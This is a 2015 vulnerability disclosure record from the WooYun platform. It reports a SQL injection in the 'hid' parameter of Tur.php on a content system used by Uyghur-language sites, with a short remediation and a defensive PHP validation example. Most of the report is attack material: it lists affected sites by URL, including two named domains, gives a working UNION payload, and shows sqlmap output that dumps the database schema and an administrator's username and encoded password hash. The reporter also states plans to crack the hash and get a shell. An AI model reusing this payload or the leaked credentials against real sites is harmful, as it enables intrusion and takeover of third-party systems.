WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online reader: http://drop.zone.ci/
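2015-10-11: Details reported to the vendor; awaiting vendor handling
2015-10-16: Vendor confirmed; details disclosed to the vendor only
2015-10-19: Details opened to third-party security partners (NSFOCUS, Tangchao Security Patrol (唐朝安全巡航))
2015-12-10: Details disclosed to core white hats and experts in related fields
2015-12-20: Details disclosed to regular white hats
2015-12-30: Details disclosed to intern white hats
2016-01-14: Details disclosed to the public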
Most of the websites using this system are in the script used over in Xinjiang... I can't read it...
The injection point is:
http://<domain>/Tur.php?hid=
7 cases:
http://**.**.**.**/tur.php?hid=24
http://**.**.**.**/Tur.php?hid=1
http://www.atax.biz/Tur.php?hid=1
http://www.xohxoh.biz/tur.php?hid=6
http://**.**.**.**/new/mtv/tur.php?hid=1
http://**.**.**.**/tur.php?hid=1
http://**.**.**.**/Tur.php?hid=1
Taking http://**.**.**.**/tur.php?hid=24 as an example:
DB_USER:
Payload: hid=-8007 UNION ALL SELECT NULL,CONCAT(0x7178627a71,0x5a675a6c5473525a736e,0x7162626271)--
---
[22:30:47] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.17
back-end DBMS: MySQL 5.0.12
[22:30:47] [INFO] fetching current user
current user: 'hanjamat@localhost'
DB:
web application technology: Nginx, PHP 5.3.17
back-end DBMS: MySQL 5.0.12
[22:30:55] [INFO] fetching current database
current database: 'hanjamat'
Tables:
Database: hanjamat
[28 tables]
+-----------------------+
| 007kino_baxlik_harkat |
| 007kino_baxlik        |
| 007kino_bikat         |
| 007kino_kino          |
| 007kino_tur           |
| 007kinobaxlik_harkat  |
| 007kinobaxlik         |
| 007kinobikat          |
| 007kinokino           |
| 007kinotur            |
| uycom_admingroups     |
| uycom_admins          |
| uycom_categories      |
| uycom_channels        |
| uycom_contents        |
| uycom_guestbook       |
| uycom_jobs            |
| uycom_orders          |
| uycom_users           |
| zuklan_admin          |
| zuklan_adminu         |
| zuklan_bekat          |
| zuklan_book           |
| zuklan_itot           |
| zuklan_itot_tur       |
| zuklan_kino           |
| zuklan_kino_tur       |
| zuklan_kino_url       |
+-----------------------+
Columns:
Database: hanjamat
Table: zuklan_admin
[7 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| zuklan_cont  | int(8)       |
| zuklan_id    | int(10)      |
| zuklan_name  | varchar(50)  |
| zuklan_names | varchar(50)  |
| zuklan_pass  | varchar(80)  |
| zuklan_pk    | tinyint(1)   |
| zuklan_text  | varchar(120) |
+--------------+--------------+
Data:
Database: hanjamat
Table: zuklan_admin
[1 entry]
+-------------+----------------------------------------------+
| zuklan_name | zuklan_pass                                  |
+-------------+----------------------------------------------+
| yusupjan    | ZmM4Y2Q2NDRkMGYyZjExZjczNWU3M2JhZDA0MmYxNGM= |
+-------------+----------------------------------------------+
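Password: ZmM4Y2Q2NDRkMGYyZjExZjczNWU3M2JhZDA0MmYxNGM=
Decoded with Base64: fc8cd644d0f2f11f735e73bad042f14c, after which it just needs to be decrypted with MD5.
Admin backend: http://<domain>//admin/login.php
The password hasn't been cracked yet... Once it is, I'll try to getshell and then come back to submit the GETSHELL vulnerability.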
As above.
Filter the input.
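One way to apply the "filter" recommendation to an integer parameter such as `hid`, as an added example (not the vendor's code, which this report does not show): strict integer validation followed by a bound query parameter. The `tur` table, its columns, the sample inputs and the in-memory SQLite database standing in for MySQL are assumptions made so the script runs offline with PHP 7.1 or later.

```php
<?php
declare(strict_types=1);

// Accept `hid` only as a positive integer; anything else is rejected, not "cleaned".
function parse_hid($raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing parameter or array input such as hid[]=1
    }
    $hid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $hid === false ? null : $hid;
}

// Look the row up with a bound parameter so the value is never parsed as SQL.
function fetch_tur(PDO $pdo, int $hid): ?array
{
    $stmt = $pdo->prepare('SELECT id, name FROM tur WHERE id = :hid'); // hypothetical schema
    $stmt->bindValue(':hid', $hid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data: in-memory SQLite stands in for the site's MySQL database.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE tur (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO tur (id, name) VALUES (24, 'demo category')");

// Constructed inputs; the third has the shape of the UNION payload in the sqlmap output.
$inputs = ['24', '999', '-8007 UNION ALL SELECT NULL,NULL', '24 OR 1=1', ['24']];
foreach ($inputs as $raw) {
    $hid = parse_hid($raw);
    if ($hid === null) {
        $result = '400 rejected';          // never reaches the database
    } else {
        $row = fetch_tur($pdo, $hid);
        $result = $row === null ? '404 not found' : '200 ' . $row['name'];
    }
    echo json_encode($raw), ' => ', $result, PHP_EOL;
}
```

Against MySQL, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the statement is prepared server-side, and connect with an account that has only the privileges the page needs.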
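Severity: High
Vulnerability Rank: 11
Confirmed: 2015-10-16 14:23
No direct handling channel with the organization that manages the website has been established yet; awaiting claim.
None yet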